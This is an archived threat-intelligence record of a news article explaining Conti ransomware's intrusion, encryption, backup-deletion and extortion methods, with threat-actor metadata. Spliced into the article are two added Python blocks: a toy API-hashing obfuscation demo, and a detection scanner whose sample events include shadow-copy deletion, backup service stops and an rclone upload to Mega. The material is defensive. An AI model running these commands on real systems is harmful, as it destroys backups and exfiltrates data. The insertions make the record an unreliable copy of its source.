{
	"id": "f2f91216-9176-482b-a613-a52d2fce460a",
	"created_at": "2026-04-06T00:20:06.855014Z",
	"updated_at": "2026-04-10T13:12:56.74107Z",
	"deleted_at": null,
	"sha1_hash": "102d29f38d4640f5bd15adf3022e3fce57e0a216",
	"title": "Conti ransomware explained: What you need to know about this aggressive criminal group",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 65828,
	"plain_text": "Conti ransomware explained: What you need to know about this\r\naggressive criminal group\r\nBy Lucian Constantin\r\nPublished: 2022-05-31 · Archived: 2026-04-05 22:44:45 UTC\r\nConti has been one of the most aggressive ransomware operations over the past two years and continues to\r\nvictimize many large companies as well as government, law enforcement and healthcare organizations.\r\nResearchers warn that unlike other ransomware groups that generally care about their reputation, Conti doesn’t\r\nalways deliver on its promises to victims.\r\n“Usually, the more successful ransomware operators put a lot of effort into establishing and maintaining some\r\nsemblance of ‘integrity’ as a way of facilitating ransom payments from victims,” researchers from Palo Alto\r\nNetworks said in an analysis. “They want to establish stellar reputations for ‘customer service’ and for delivering\r\non what they promise—that if you pay a ransom, your files will be decrypted (and they will not appear on a leak\r\nwebsite). Yet in our experience helping clients remediate attacks, Conti has not demonstrated any signs that it\r\ncares about its reputation with would-be victims.”\r\nConti first appeared in late 2019 and has slowly grown to become one of the predominant ransomware-as-a-service (RaaS) operations. It’s believed to have some connections to the Ryuk ransomware, which was run by a\r\nRussian cybercrime group known as Wizard Spider. The US Cybersecurity and Infrastructure Security Agency\r\n(CISA) and the Federal Bureau of Investigation (FBI) said in a recent alert that they observed the use of Conti\r\nransomware in over 400 attacks against US and international organizations. According to cybercrime intelligence\r\nfirm Recorded Future, Conti was the ransomware strain responsible for the second largest number of victims in\r\nSeptember 2021 after LockBit.\r\nConti also operates a little differently than other RaaS groups. 
Most groups work with partners called affiliates to\r\ncompromise victims and deploy the ransomware program for a percentage of the ransom payments, but Conti is\r\nbelieved to pay a monthly wage to its developers.\r\nThe rebranding of Conti\r\nIn May 2022, security intelligence companies reported that the Conti infrastructure, including its official website,\r\nnegotiation service, chat rooms and messengers were shut down or being reset. Researchers from security firm\r\nAdvIntel believe that the group is shutting down the Conti brand and will likely splinter off into separate teams, a\r\nprocess that began months ago and has accelerated recently.\r\nIt also comes after Conti launched a major ransomware and data leak extortion attack in April that impacted at\r\nleast 27 Costa Rican government organizations causing disruptions in its customs and taxes platforms and\r\nimpacting foreign trade and public payroll payments. This prompted the country’s president Rodrigo Chaves to\r\ndeclare a state of national emergency on May 8.\r\nhttps://www.csoonline.com/article/3638056/conti-ransomware-explained-and-why-its-one-of-the-most-aggressive-criminal-groups.html\r\nPage 1 of 5\n\nChaves called the Conti group terrorists and said there are indications people inside the country are collaborating\r\nwith the group. In response, the Conti attackers claim to have released over 650GB of data taken from Costa\r\nRican government systems after the government refused to pay the $10 million extortion fee. The U.S. State\r\nDepartment put up a reward of $10 million for information related to the identity or location of Conti’s leaders as\r\nwell as $5 million for information leading to the arrest of any Conti co-conspirator from any country.\r\n“This shutdown highlights a simple truth that has been evident for the Conti leadership since early Spring 2022 –\r\nthe group can no longer sufficiently support and obtain extortion,” AdvIntel researchers said in a report. 
“The\r\nblog’s key and only valid purpose is to leak new datasets, and this operation is now gone. This was not a\r\nspontaneous decision, instead, it was a calculated move, signs of which were evident since late April. Two weeks\r\nago, on May 6, AdvIntel explained that the Conti brand, and not the organization itself, was in the process of the\r\nfinal shutdown. As of May 19, 2022, our exclusive source intelligence confirms that today is Conti’s official date\r\nof death.”\r\nConti also took a significant public relations hit in the cybercrime world when, following Russia’s invasion of\r\nUkraine, it announced its full support for the Russian government and threatened retaliatory cyber attacks against\r\nthe critical infrastructure of any countries that attacked Russia. Other ransomware groups took the opportunity to\r\ndistance themselves from the conflict and declare their political neutrality. Conti later tried to backtrack and said\r\nin a new message that it doesn’t ally with any government and condemns the war, but the reputational damage was\r\nalready done.\r\nThis was followed by a security researcher leaking tens of thousands of messages from Conti’s internal chat\r\nsystem, giving the infosecurity industry and the whole world a deeper look into how the operation\r\nwas being run.\r\nWhile the Conti brand might indeed be dead, the people connected to it will likely continue to engage in\r\ncybercriminal activities as part of other teams under different names. Some of these spin-off teams have already\r\nexisted inside the Conti group — for example, a data extortion group called Karakurt or a new ransomware\r\noperation called Black Basta that’s possibly related to Conti.\r\nHow Conti gains initial network access\r\nThe attackers using Conti employ many methods of obtaining access to corporate networks, including buying\r\naccess from other groups that already have such access—the so-called network access brokers. 
Like Ryuk, Conti\r\noperators have used the TrickBot malware for access, as well as other Trojans such as IcedID. These Trojans are\r\ntypically distributed through spear-phishing emails containing malicious links or Microsoft Word attachments.\r\nStolen or weak Remote Desktop Protocol (RDP) credentials are also a common method of entry into networks for\r\nConti and for ransomware groups in general. The CISA and FBI advisory also mentions fake software promoted via search engine\r\noptimization, malware distribution networks like ZLoader, and the exploitation of vulnerabilities in internet-facing IT\r\nassets as other common ways for Conti affiliates to gain access. In intrusions investigated by Sophos that\r\nresulted in Conti deployment, the company observed the exploitation of FortiGate firewall appliances running\r\nvulnerable firmware.\r\nHow Conti moves laterally\r\nOnce inside a company, the attackers use a collection of tools to map the network and expand their access.\r\nResearchers have seen the use of the Cobalt Strike attack framework and a penetration testing tool called Router\r\nScan that can scan for and brute-force the web administration credentials of routers, cameras and network-attached\r\nstorage devices.\r\nThe attackers also launch Kerberos attacks in an attempt to obtain the administrator account hash for offline brute-forcing. 
Many groups, including Conti, use common tools such as the Windows Sysinternals utilities or Mimikatz to\r\nobtain user hashes and plaintext credentials that enable privilege escalation and lateral movement inside the\r\ndomain.\r\nConti affiliates have also been observed exploiting well-known Windows vulnerabilities inside networks, such as\r\nSMB server vulnerabilities (including EternalBlue), PrintNightmare (CVE-2021-34527) in the Windows Print Spooler service, or\r\nZerologon (CVE-2020-1472) in Active Directory domain controllers.\r\nHow Conti encrypts files and deletes backups\r\nThe Conti attackers don’t deploy the ransomware directly and instead rely on more lightweight loaders that can\r\nevade antivirus detection. The group has used Cobalt Strike and Meterpreter (Metasploit) implants, as well\r\nas a loader called getuid, to inject the ransomware directly into memory.\r\n“Because the reflective loaders deliver the ransomware payload into memory, never writing the ransomware\r\nbinary to the infected computer’s file system, the attackers eliminate a critical Achilles heel that affects most other\r\nransomware families: There is no artifact of the ransomware left behind for even a diligent malware analyst to\r\ndiscover and study,” researchers from Sophos said in an analysis earlier this year.\r\nThe ransomware also obfuscates its strings and Windows API calls: instead of importing API functions by name, it\r\nresolves them at runtime from hash values, and it adds another layer of encryption on top of that table. All this is\r\nmeant to make both automated detection by security products and manual reverse engineering harder.\r\nAnother interesting aspect of the Conti ransomware is that it supports command line execution parameters that\r\ninstruct it to encrypt either the local disk, a particular network share or even a list of network shares defined in a\r\nfile. 
“The notable effect of this capability is that it can cause targeted damage in an environment in a method that\r\ncould frustrate incident response activities,” researchers from VMware said in an analysis. “A successful attack\r\nmay have destruction that’s limited to the shares of a server that has no internet capability, but where there is no\r\nevidence of similar destruction elsewhere in the environment. This also has the effect of reducing the overall\r\n‘noise’ of a ransomware attack where hundreds of systems immediately start showing signs of infection. Instead,\r\nthe encryption may not even be noticeable for days, or weeks, later once the data is accessed by a user.”\r\nConti encrypts file contents with AES-256 and protects the AES keys with an RSA public key that’s hard-coded in the\r\nransomware program, so only the attackers’ private key can recover them. Each binary is built for a specific victim,\r\nwhich gives every victim a unique key pair, and because no key exchange is needed the program can encrypt files\r\neven if it’s unable to contact a command-and-control server.\r\nThe Conti attackers also put a lot of effort into complicating restoration efforts. The malware starts by disabling\r\nand deleting the Windows Volume Shadow Copies, then iterates through around 160 commands to stop and disable\r\nvarious Windows services, including some belonging to third-party backup products such as Acronis\r\nVSS Provider, Enterprise Client Service, SQLsafe Backup Service, SQLsafe Filter Service, Veeam Backup\r\nCatalog Data Service and AcronisAgent.\r\nData exfiltration for double extortion\r\nAccording to a report from security firm AdvIntel, Conti doesn’t only delete backups, but also leverages the\r\nbackup services to exfiltrate data so it can later blackmail victims with threats of data leaks. 
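The API hashing described above (resolving Windows API functions from hash values rather than importing them by name, with a second encryption layer over the table), as an added example that is not Conti's code and not part of the original article: a toy packer replaces the import names with XOR-encrypted hashes, and an analyst-side resolver precomputes the same hash over a list of known exports to map the values back to names. The hash routine (a ROR13-style rotate-and-add), the XOR key and the export list are illustrative assumptions; Conti's real routines are not reproduced here.

```python
import struct

# Constructed stand-in for the export tables an analyst would dump from the real DLLs
# (kernel32.dll, advapi32.dll, mpr.dll); a real table would hold thousands of names.
KNOWN_EXPORTS = [
    'CreateFileW', 'WriteFile', 'ReadFile', 'CloseHandle', 'FindFirstFileW',
    'FindNextFileW', 'CryptAcquireContextW', 'CryptGenRandom', 'OpenSCManagerW',
    'ControlService', 'GetLogicalDrives', 'WNetEnumResourceW', 'VirtualAlloc',
]

# APIs the constructed sample needs; DeleteFileW is deliberately missing from
# KNOWN_EXPORTS so the resolver has an unresolved entry to report.
NEEDED_APIS = ['CreateFileW', 'WriteFile', 'FindFirstFileW', 'CryptGenRandom',
               'OpenSCManagerW', 'ControlService', 'DeleteFileW']
XOR_KEY = 0x5A  # illustrative single-byte key for the second obfuscation layer


def api_hash(name):
    # ROR13-style rolling hash over the ASCII name. Illustrative only: the hash
    # routine Conti actually uses is not reproduced here.
    h = 0
    for b in name.encode('ascii'):
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + b) & 0xFFFFFFFF
    return h


def xor_layer(data, key):
    # Second layer: single-byte XOR, so even the raw hash values are not visible
    return bytes(b ^ key for b in data)


def build_import_table(names, key):
    # Malware side: what the binary embeds instead of an import table with names,
    # little-endian 32-bit hashes that are then XOR-encrypted.
    raw = b''.join(struct.pack('<I', api_hash(n)) for n in names)
    return xor_layer(raw, key)


def visible_names(blob, names):
    # What a plain strings-style scan or a YARA rule on API names would still see
    return [n for n in names if n.encode('ascii') in blob]


def resolve_table(blob, key, exports):
    # Analyst side: undo the XOR layer, then map every hash back to a name using a
    # lookup table precomputed from the known exports (the same trick the loader
    # uses at runtime against the real export tables in memory).
    lookup = {api_hash(n): n for n in exports}
    raw = xor_layer(blob, key)
    hashes = struct.unpack(f'<{len(raw) // 4}I', raw)
    return [lookup.get(h, f'UNRESOLVED_{h:08x}') for h in hashes]


if __name__ == '__main__':
    blob = build_import_table(NEEDED_APIS, XOR_KEY)
    print('API names visible in the embedded table:', visible_names(blob, NEEDED_APIS))
    for entry in resolve_table(blob, XOR_KEY, KNOWN_EXPORTS):
        print(' ', entry)
```

The resolver runs the comparison in the other direction (hash every known name, then look up the values found in the sample), which is why hashed imports cost an analyst with a good export list little more than the effort of peeling off the outer encryption layer; the technique mainly defeats signature scans that key on API names in the file.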
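One detection approach for the backup tampering just described and for the Rclone uploads to cloud storage that Conti has been observed using for exfiltration, as an added example that is not from the article or the advisories it cites: a small Python scanner over process-creation events that flags shadow-copy deletion, stops of backup-related services, a burst of net stop commands from one host, and rclone transfers to a named cloud remote. The event lines, host and user names, service short names and thresholds are constructed for the demo; the key=value log format stands in for whatever your SIEM exports.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed process-creation events (Sysmon Event ID 1 style, flattened to key=value
# pairs). Hosts, users and times are invented; the command lines mirror the techniques
# the article describes. The cmd= field is always last and may contain spaces.
SAMPLE_EVENTS = [
    '2022-04-18T02:40:30Z host=FS01 user=backupadm parent=cmd.exe image=rclone.exe cmd=rclone copy E:/Finance mega:dump --transfers 32',
    '2022-04-18T03:12:07Z host=FS01 user=backupadm parent=cmd.exe image=vssadmin.exe cmd=vssadmin delete shadows /all /quiet',
    '2022-04-18T03:12:09Z host=FS01 user=backupadm parent=cmd.exe image=wmic.exe cmd=wmic shadowcopy delete',
    '2022-04-18T03:12:12Z host=FS01 user=backupadm parent=cmd.exe image=net.exe cmd=net stop VeeamBackupSvc /y',
    '2022-04-18T03:12:13Z host=FS01 user=backupadm parent=cmd.exe image=net.exe cmd=net stop AcronisAgent /y',
    '2022-04-18T03:12:14Z host=FS01 user=backupadm parent=cmd.exe image=net.exe cmd=net stop SQLsafe /y',
    '2022-04-18T03:12:15Z host=FS01 user=backupadm parent=cmd.exe image=net.exe cmd=net stop MSSQLSERVER /y',
    # Benign admin activity on another host: must not alert
    '2022-04-18T09:00:01Z host=WS22 user=jdoe parent=explorer.exe image=net.exe cmd=net stop Spooler',
    '2022-04-18T09:05:44Z host=WS22 user=jdoe parent=explorer.exe image=vssadmin.exe cmd=vssadmin list shadows',
]

# Substrings marking a service as backup- or snapshot-related (extend from your own inventory)
BACKUP_SERVICE_KEYWORDS = ('veeam', 'acronis', 'sqlsafe', 'backup', 'vss')
NET_IMAGES = ('net.exe', 'net1.exe')


def parse_event(line):
    ts, rest = line.split(' ', 1)
    head, _, cmd = rest.partition(' cmd=')
    ev = dict(tok.partition('=')[::2] for tok in head.split(' '))
    ev['ts'] = datetime.strptime(ts, '%Y-%m-%dT%H:%M:%SZ')
    ev['image'] = ev['image'].lower()
    ev['cmd'] = cmd.lower()
    return ev


def rclone_remote(cmd):
    # First rclone remote argument (name:path). A single letter before the colon is a
    # drive letter, not a remote, so e:/finance is ignored while mega:dump is returned.
    for tok in cmd.split(' '):
        name, sep, _ = tok.partition(':')
        if sep and len(name) > 1 and not name.startswith('-'):
            return tok
    return None


def is_service_stop(ev):
    return ev['image'] in NET_IMAGES and ev['cmd'].startswith('net stop ')


def classify(ev):
    # Per-event rules; each appends a short rule name on match
    hits = []
    img, cmd = ev['image'], ev['cmd']
    parts = cmd.split(' ')
    if img == 'vssadmin.exe' and 'delete' in cmd and 'shadows' in cmd:
        hits.append('shadow_copy_deletion')
    if img == 'wmic.exe' and 'shadowcopy' in cmd and 'delete' in cmd:
        hits.append('shadow_copy_deletion')
    if img == 'wbadmin.exe' and 'delete' in cmd and 'catalog' in cmd:
        hits.append('backup_catalog_deletion')
    if is_service_stop(ev) and any(k in parts[2] for k in BACKUP_SERVICE_KEYWORDS):
        hits.append('backup_service_stop')
    if img == 'rclone.exe' and len(parts) > 1 and parts[1] in ('copy', 'sync', 'move') and rclone_remote(cmd):
        hits.append('rclone_cloud_upload')
    return hits


def detect(lines, window=timedelta(seconds=60), burst_threshold=3):
    # Returns {host: [(rule, evidence), ...]}. Besides the per-event rules, flag a burst
    # of net stop commands on one host inside the window: a scripted run of ~160 service
    # stops looks nothing like an admin restarting a single service.
    events = sorted((parse_event(line) for line in lines), key=lambda e: e['ts'])
    alerts = defaultdict(list)
    stop_times = defaultdict(list)
    for ev in events:
        for rule in classify(ev):
            alerts[ev['host']].append((rule, ev['cmd']))
        if is_service_stop(ev):
            stop_times[ev['host']].append(ev['ts'])
    for host, times in stop_times.items():
        for i in range(burst_threshold - 1, len(times)):
            if times[i] - times[i - burst_threshold + 1] <= window:
                alerts[host].append(('mass_service_stop',
                                     f'{burst_threshold}+ net stop commands within {window.seconds}s'))
                break
    return dict(alerts)


if __name__ == '__main__':
    for host, found in detect(SAMPLE_EVENTS).items():
        print(host)
        for rule, evidence in found:
            print(f'  {rule:<24} {evidence}')
```

In production the burst threshold would be higher than three and the keyword list drawn from the backup products actually deployed; the value of the burst rule is that a scripted sequence of service stops is far more distinctive than any single command, and it fires before the encryption stage starts.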
“Conti hunts for\r\nVeeam privileged users and services and leverages them to access, exfiltrate, remove and encrypt backups to ensure\r\nransomware breaches are un-backupable,” the company’s researchers said. “This way, Conti simultaneously\r\nexfiltrated the data for further victim blackmailing, while leaving the victim with no chances to quickly recover\r\ntheir files as the backups are removed.”\r\nThe Conti attackers have also often been observed using the open-source Rclone utility to upload company data to\r\ncloud-based file hosting services like Mega.\r\nLike most ransomware groups these days, Conti maintains a data leak website where it posts information about\r\nnew victims. The group has recently become annoyed with the fact that its ransom negotiation chats with victims\r\nare being leaked to journalists. This happens because negotiations take place through victim-specific\r\n“payment sites” set up by the attackers, whose addresses are usually included in the ransom notes left on victim systems. If the\r\nransom notes are uploaded to services like VirusTotal, malware researchers can find the payment sites and\r\nread the communication there between victims and the group.\r\nIn a recent blog post, the group threatened to release the data from any victim it’s negotiating with if the chats are\r\nleaked during the negotiation. This recently happened after the group compromised Japanese electronics\r\nmanufacturer JVCKenwood. “For instance, yesterday, we have found that our chat with JVCKenwood whom we\r\nhit a week ago got reported to the journalists,” the group wrote. “Despite what is said in the article, the\r\nnegotiations were going in accordance with a normal business operation. However, since the publication happened\r\nin the middle of negotiations it resulted in our decision to terminate the negotiations and publish the data.\r\nJVCKenwood has been already informed. 
Moreover, this week we have once again spotted screenshots from our\r\nnegotiation chats circulating over social media.”\r\nThe group also warned that if the negotiation chats are leaked after the ransom is paid and the victim’s stolen data\r\nhas been deleted, it will publish the data stolen from another victim as a form of collective punishment.\r\nHow to mitigate Conti attacks\r\nThe joint FBI and CISA advisory contains general ransomware mitigation advice and additional resources,\r\nincluding recommendations such as using multi-factor authentication for accounts, implementing network\r\nsegmentation and traffic filtering, scanning for software vulnerabilities and keeping software products up to date,\r\nremoving unnecessary applications and applying software execution restrictions and controls, restricting remote\r\naccess such as RDP and limiting access to resources over the network, auditing and limiting the use of\r\nadministrative accounts, and deploying endpoint detection and response (EDR) tools.\r\nThe advisory also links to a list of Conti indicators of compromise (IOCs), and the tactics, techniques and\r\nprocedures used by the group are mapped to the MITRE ATT\u0026CK framework.\r\nSource: https://www.csoonline.com/article/3638056/conti-ransomware-explained-and-why-its-one-of-the-most-aggressive-criminal-groups.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.csoonline.com/article/3638056/conti-ransomware-explained-and-why-its-one-of-the-most-aggressive-criminal-groups.html"
	],
	"report_names": [
		"conti-ransomware-explained-and-why-its-one-of-the-most-aggressive-criminal-groups.html"
	],
	"threat_actors": [
		{
			"id": "6ad410c7-e291-4327-a54b-281c23f0d4fa",
			"created_at": "2022-10-25T16:07:24.501468Z",
			"updated_at": "2026-04-10T02:00:05.013427Z",
			"deleted_at": null,
			"main_name": "Karakurt",
			"aliases": [
				"Mushy Scorpius"
			],
			"source_name": "ETDA:Karakurt",
			"tools": [
				"7-Zip",
				"Agentemis",
				"AnyDesk",
				"Cobalt Strike",
				"CobaltStrike",
				"FileZilla",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Mimikatz",
				"WinZip",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f276b8a6-73c9-494a-8ab2-13e2f1da4c53",
			"created_at": "2022-10-25T16:07:24.441133Z",
			"updated_at": "2026-04-10T02:00:04.993411Z",
			"deleted_at": null,
			"main_name": "Achilles",
			"aliases": [],
			"source_name": "ETDA:Achilles",
			"tools": [
				"RDP",
				"Remote Desktop Protocol"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "2af9bea3-b43e-4a6d-8dc6-46dad6e3ff24",
			"created_at": "2022-10-25T16:47:55.853415Z",
			"updated_at": "2026-04-10T02:00:03.856263Z",
			"deleted_at": null,
			"main_name": "GOLD TOMAHAWK",
			"aliases": [
				"Karakurt",
				"Karakurt Lair",
				"Karakurt Team"
			],
			"source_name": "Secureworks:GOLD TOMAHAWK",
			"tools": [
				"7-Zip",
				"AnyDesk",
				"Mega",
				"QuickPacket",
				"Rclone",
				"SendGB"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "079e3d6e-24ef-42b0-b555-75c288f9efd8",
			"created_at": "2023-03-04T02:01:54.105946Z",
			"updated_at": "2026-04-10T02:00:03.359009Z",
			"deleted_at": null,
			"main_name": "Karakurt",
			"aliases": [
				"Karakurt Lair"
			],
			"source_name": "MISPGALAXY:Karakurt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f6f91e1c-9202-4497-bf22-9cd5ef477600",
			"created_at": "2023-01-06T13:46:38.86765Z",
			"updated_at": "2026-04-10T02:00:03.12735Z",
			"deleted_at": null,
			"main_name": "WIZARD SPIDER",
			"aliases": [
				"TEMP.MixMaster",
				"GOLD BLACKBURN",
				"DEV-0193",
				"UNC2053",
				"Pistachio Tempest",
				"DEV-0237",
				"Storm-0230",
				"FIN12",
				"Periwinkle Tempest",
				"Storm-0193",
				"Trickbot LLC"
			],
			"source_name": "MISPGALAXY:WIZARD SPIDER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bc119938-a79c-4e5f-9d4d-dc96835dfe2e",
			"created_at": "2024-06-04T02:03:07.799286Z",
			"updated_at": "2026-04-10T02:00:03.606456Z",
			"deleted_at": null,
			"main_name": "GOLD BLACKBURN",
			"aliases": [
				"ITG23 ",
				"Periwinkle Tempest ",
				"Wizard Spider "
			],
			"source_name": "Secureworks:GOLD BLACKBURN",
			"tools": [
				"BazarLoader",
				"Buer Loader",
				"Bumblebee",
				"Dyre",
				"Team9",
				"TrickBot"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "63061658-5810-4f01-9620-7eada7e9ae2e",
			"created_at": "2022-10-25T15:50:23.752974Z",
			"updated_at": "2026-04-10T02:00:05.244531Z",
			"deleted_at": null,
			"main_name": "Wizard Spider",
			"aliases": [
				"Wizard Spider",
				"UNC1878",
				"TEMP.MixMaster",
				"Grim Spider",
				"FIN12",
				"GOLD BLACKBURN",
				"ITG23",
				"Periwinkle Tempest",
				"DEV-0193"
			],
			"source_name": "MITRE:Wizard Spider",
			"tools": [
				"TrickBot",
				"AdFind",
				"BITSAdmin",
				"Bazar",
				"LaZagne",
				"Nltest",
				"GrimAgent",
				"Dyre",
				"Ryuk",
				"Conti",
				"Emotet",
				"Rubeus",
				"Mimikatz",
				"Diavol",
				"PsExec",
				"Cobalt Strike"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "e6a21528-2999-4e2e-aaf4-8b6af14e17f3",
			"created_at": "2022-10-25T16:07:24.422115Z",
			"updated_at": "2026-04-10T02:00:04.983298Z",
			"deleted_at": null,
			"main_name": "Wizard Spider",
			"aliases": [
				"DEV-0193",
				"G0102",
				"Gold Blackburn",
				"Gold Ulrick",
				"Grim Spider",
				"ITG23",
				"Operation BazaFlix",
				"Periwinkle Tempest",
				"Storm-0230",
				"TEMP.MixMaster",
				"Wizard Spider"
			],
			"source_name": "ETDA:Wizard Spider",
			"tools": [
				"AdFind",
				"Agentemis",
				"Anchor_DNS",
				"BEERBOT",
				"BazarBackdoor",
				"BazarCall",
				"BazarLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"Conti",
				"Diavol",
				"Dyranges",
				"Dyre",
				"Dyreza",
				"Dyzap",
				"Gophe",
				"Invoke-SMBAutoBrute",
				"KEGTAP",
				"LaZagne",
				"LightBot",
				"PowerSploit",
				"PowerTrick",
				"PsExec",
				"Ryuk",
				"SessionGopher",
				"TSPY_TRICKLOAD",
				"Team9Backdoor",
				"The Trick",
				"TheTrick",
				"Totbrick",
				"TrickBot",
				"TrickLoader",
				"TrickMo",
				"Upatre",
				"bazaloader",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434806,
	"ts_updated_at": 1775826776,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/102d29f38d4640f5bd15adf3022e3fce57e0a216.pdf",
		"text": "https://archive.orkl.eu/102d29f38d4640f5bd15adf3022e3fce57e0a216.txt",
		"img": "https://archive.orkl.eu/102d29f38d4640f5bd15adf3022e3fce57e0a216.jpg"
	}
}